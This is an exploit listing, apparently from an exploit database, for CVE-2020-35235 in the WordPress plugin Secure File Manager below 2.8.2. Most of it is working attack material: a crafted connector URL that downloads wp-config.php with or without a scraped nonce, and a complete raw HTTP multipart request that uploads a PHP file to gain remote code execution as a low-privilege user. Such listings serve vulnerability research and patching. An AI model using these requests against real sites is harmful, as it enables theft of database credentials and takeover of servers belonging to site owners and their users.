Exploit for Secure File Manager < 2.8.2 - Authenticated Remote Command Execution CVE-2020-35235

Name: Exploit for Secure File Manager < 2.8.2 - Authenticated Remote Command Execution CVE-2020-35235
Rating: 5 (292 reviews)
2020-11-23 | CVSS 6.5
## https://sploitus.com/exploit?id=WPEX-ID:47C1639F-4558-4CB6-8F50-E5E8564663C2
Download the wp-config.php

< 2.6 - As an unauthenticated user, open /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&cpath=/wp-admin/admin.php

< 2.8.2 - Log in as any user, access the Secure File Manager menu (wp-admin/admin.php?page=sfm_file_manager) which will result in an Unauthorized Access error unless logged in as admin, view the source of the page and retrieve the value of the sfmpNonceKey. Then append it to the URL above in a _wnonce parameter:

/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&_wpnonce=69f62e1414&cpath=/wp-admin/admin.php


RCE can be obtained as well, with a crafted request to upload a PHP file, e.g /hello-user.php

for < 2.8.2, get the nonce with the same technique as above
for < 2.6, just remove the _wpnonce parameter

POST /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/admin.php?page=sfm_file_manager
Content-Type: multipart/form-data; boundary=---------------------------32138351926630035821198693946
Content-Length: 851
Origin: http://127.0.0.1
Connection: close
Cookie: [Subscriber cookie]

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="reqid"

1770034af3e3c9
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="cmd"

upload
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="_wpnonce"

69f62e1414
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="upload[]"; filename="hello-user.php"
Content-Type: text/plain

<?php echo 'failed'; ?>

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="mtime[]"

1375102826
-----------------------------32138351926630035821198693946--